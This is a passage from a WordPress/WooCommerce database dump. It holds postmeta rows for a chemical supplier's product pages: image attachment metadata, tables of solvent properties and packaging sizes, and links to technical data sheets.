:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14305, 1278, '_thumbnail_id', '1281'); 
INSERT INTO `wp_postmeta` VALUES (14306, 1282, '_wp_attached_file', '2016/08/VAZO-52.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14307, 1282, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4128;s:6:"height";i:3096;s:4:"file";s:19:"2016/08/VAZO-52.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"VAZO-52-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"VAZO-52-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"VAZO-52-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"VAZO-52-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"VAZO-52-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"VAZO-52-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"VAZO-52-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"VAZO-52-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14308, 568, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14309, 568, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14310, 1283, '_wp_attached_file', '2016/09/Vertrel-XF-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14311, 1284, '_wp_attached_file', '2016/09/MS-780-782.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14312, 1278, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14313, 1278, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14314, 1285, '_wp_attached_file', '2016/09/vertrel.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14315, 1285, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4368;s:6:"height";i:2912;s:4:"file";s:19:"2016/09/vertrel.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"vertrel-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"vertrel-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"vertrel-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"vertrel-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"vertrel-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"vertrel-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"vertrel-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"vertrel-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14316, 1278, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14318, 1287, '_edit_lock', '1477684946:2'); 
INSERT INTO `wp_postmeta` VALUES (14319, 1287, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14320, 1288, '_wp_attached_file', '2016/09/Opteon-Sion.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14321, 1289, '_wp_attached_file', '2016/09/opteon-sion.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14322, 1289, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:23:"2016/09/opteon-sion.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"opteon-sion-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"opteon-sion-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"opteon-sion-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"opteon-sion-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"opteon-sion-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"opteon-sion-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"opteon-sion-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"opteon-sion-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14323, 1287, '_thumbnail_id', '1289'); 
INSERT INTO `wp_postmeta` VALUES (14324, 1287, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14325, 1287, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14326, 1287, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Property @ 25°C (77°F)</td>\r\n<td width="224"></td>\r\n</tr>\r\n<tr>\r\n<td width="202">Boiling Point</td>\r\n<td style="text-align: center;" width="224">47°C</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Liquid Density</td>\r\n<td style="text-align: center;" width="224">1.279 g/cm<sup>3</sup></td>\r\n</tr>\r\n<tr>\r\n<td width="202">Liquid Kinematic Viscosity</td>\r\n<td style="text-align: center;" width="224">0.03251 cm<sup>2</sup>/s</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Liquid Specific Heat</td>\r\n<td style="text-align: center;" width="224">1.092 kJ/kg-K</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Liquid Thermal Conductivity</td>\r\n<td style="text-align: center;" width="224">127 mW/m-K</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Vapor Pressure</td>\r\n<td style="text-align: center;" width="224">44.1 kPa</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Heat of Vaporization</td>\r\n<td style="text-align: center;" width="224">226 kJ/kg</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Flash Point, CC, ASTM D56</td>\r\n<td style="text-align: center;" width="224">0</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Flash Point, OC, ASTM D1310</td>\r\n<td style="text-align: center;" width="224">0</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Vapor Flammability, ASTM E681</td>\r\n<td style="text-align: center;" width="224">7.25-15.25 vol%</td>\r\n</tr>\r\n<tr>\r\n<td width="202">KB Value, ASTM D1133</td>\r\n<td style="text-align: center;" width="224">100</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14327, 1287, '716_default_editor', '<ul>\r\n 	<li>Oil and grease removal</li>\r\n 	<li>Precision cleaning</li>\r\n 	<li>High solvency defluxing</li>\r\n 	<li>Silicone removal</li>\r\n 	<li>Cold cleaning</li>\r\n 	<li>Vapor Degreasing\r\n<ul>\r\n 	<li>Fuel Injection, Anti-Lock Braking Systems, Compressors, Relays</li>\r\n 	<li>Landing Gear</li>\r\n 	<li>Oxygen Systems</li>\r\n 	<li>Printed Circuit Boards</li>\r\n 	<li>Watches</li>\r\n 	<li>Jewelry</li>\r\n 	<li>Camera Lenses</li>\r\n 	<li>Flat Panel Displays</li>\r\n 	<li>Optical Assemblies</li>\r\n 	<li>Cables</li>\r\n 	<li>Optical Fibers</li>\r\n</ul>\r\n</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14328, 1287, '719_default_editor', '<ul>\r\n 	<li>ASTM D56</li>\r\n 	<li>ASTM D1310</li>\r\n 	<li>ASTM E681</li>\r\n 	<li>ASTM D1133</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14329, 1287, '318_custom_list_file', 'a:2:{s:32:"40535a91011feb6715931316339d36eb";a:3:{s:4:"name";s:15:"Opteon Sion PDF";s:4:"file";s:123:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion-specialty-cleaning-fluid-technical-information.pdf";s:4:"desc";s:20:"Technical Data Sheet";}s:32:"eb12fc0381113159e2c2d1da78a1060d";a:3:{s:4:"name";s:32:"Opteon Sion Marketing Literature";s:4:"file";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/Opteon-Sion.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14330, 1287, '317_default_editor', '<table width="487">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="224"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">1 Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14331, 1287, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14332, 1287, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14333, 1287, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14334, 1287, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14335, 1287, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14336, 1287, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14337, 1287, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14338, 1287, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14339, 1287, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14340, 1287, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14341, 1287, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14342, 1287, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14343, 1287, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14344, 1287, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14345, 1287, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14346, 1287, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14347, 1287, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14348, 1287, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14349, 1287, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14350, 1287, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14351, 1287, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14352, 1287, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14353, 1287, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14354, 1287, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14355, 1287, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14356, 1287, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14357, 1287, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (14358, 1287, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (14359, 1287, '_ywtm_content_tab_description', '<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14360, 1287, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14361, 1287, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14362, 1287, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14363, 1287, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14364, 1287, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (14365, 1287, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14366, 1290, '_wp_attached_file', '2016/09/opteon.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14367, 1290, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:18:"2016/09/opteon.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"opteon-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"opteon-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"opteon-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"opteon-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"opteon-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"opteon-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"opteon-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"opteon-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14368, 1291, '_wp_attached_file', '2016/08/DENTAL.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14369, 1291, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2008;s:4:"file";s:18:"2016/08/DENTAL.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"DENTAL-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"DENTAL-800x535.jpg";s:5:"width";i:800;s:6:"height";i:535;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"DENTAL-768x514.jpg";s:5:"width";i:768;s:6:"height";i:514;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"DENTAL-1600x1071.jpg";s:5:"width";i:1600;s:6:"height";i:1071;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"DENTAL-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"DENTAL-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"DENTAL-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"DENTAL-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14370, 474, '716_default_editor', '<span class="C-12"><strong>Usage Recommendations</strong>\r\n</span><span class="C-8">Miller-<wbr />Stephenson strongly recommends the use of SolvSys™ MS-<wbr />255DA, our Surface PrepClean™ to remove all previous lubrications and debris prior to first application of MS-<wbr />4130DA or MS-<wbr />4010.  Please review our Technical Data Sheet for more information and recommendations. </span>'); 
INSERT INTO `wp_postmeta` VALUES (14371, 474, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14372, 1292, '_edit_lock', '1480430503:3'); 
INSERT INTO `wp_postmeta` VALUES (14373, 1292, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (14374, 1293, '_wp_attached_file', '2016/08/VAZO-88.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14375, 1293, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:19:"2016/08/VAZO-88.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"VAZO-88-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"VAZO-88-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"VAZO-88-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"VAZO-88-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"VAZO-88-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"VAZO-88-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"VAZO-88-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"VAZO-88-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14376, 577, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14377, 577, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14378, 1294, '_wp_attached_file', '2016/09/Contact-Re-Nu.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14379, 1292, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14380, 1292, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14381, 1292, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202"><strong>Typical Properties</strong></td>\r\n<td width="224"></td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">98°F</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">1.33 g/ml @ 77°F</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content of MS-530</td>\r\n<td style="text-align: center;">437 g/l</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content of MS-532</td>\r\n<td style="text-align: center;">375g/l</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14382, 1292, '716_default_editor', '<ul>\r\n 	<li>Connector Cleaner</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14383, 1292, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14384, 1292, '318_custom_list_file', 'a:1:{s:32:"9625ce5e4b4ff4a63aac5e503edcd672";a:3:{s:4:"name";s:20:"Technical Data Sheet";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-530N_532N.pdf";s:4:"desc";s:12:"MS-530N/532N";}}'); 
INSERT INTO `wp_postmeta` VALUES (14385, 1292, '317_default_editor', '<table width="689">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">12 oz.</td>\r\n<td style="text-align: center;">1 Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14386, 1292, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14387, 1292, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14388, 1292, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14389, 1292, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14390, 1292, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14391, 1292, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14392, 1292, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14393, 1292, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14394, 1292, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14395, 1292, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14396, 1292, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14397, 1292, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14398, 1292, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14399, 1292, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14400, 1292, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14401, 1292, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14402, 1292, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14403, 1292, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14404, 1292, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14405, 1292, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14406, 1292, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14407, 1292, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14408, 1292, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14409, 1292, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14410, 1292, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14411, 1292, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14412, 1292, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14413, 1292, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14414, 1292, '_product_image_gallery', '1823'); 
INSERT INTO `wp_postmeta` VALUES (14415, 850, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14477, 1312, '_wp_attached_file', '2016/08/9937.tif'); 
INSERT INTO `wp_postmeta` VALUES (14478, 1313, '_wp_attached_file', '2016/08/9939.tif'); 
INSERT INTO `wp_postmeta` VALUES (14479, 1314, '_wp_attached_file', '2016/08/9941.tif'); 
INSERT INTO `wp_postmeta` VALUES (14480, 1315, '_wp_attached_file', '2016/08/9959.tif'); 
INSERT INTO `wp_postmeta` VALUES (14483, 1316, '_wp_attached_file', '2016/08/9961.tif'); 
INSERT INTO `wp_postmeta` VALUES (14484, 1317, '_wp_attached_file', '2016/08/9963.tif'); 
INSERT INTO `wp_postmeta` VALUES (14485, 1318, '_wp_attached_file', '2016/08/9965.tif'); 
INSERT INTO `wp_postmeta` VALUES (14486, 1320, '_wp_attached_file', '2016/08/9969.tif'); 
INSERT INTO `wp_postmeta` VALUES (14487, 1321, '_wp_attached_file', '2016/08/9971.tif'); 
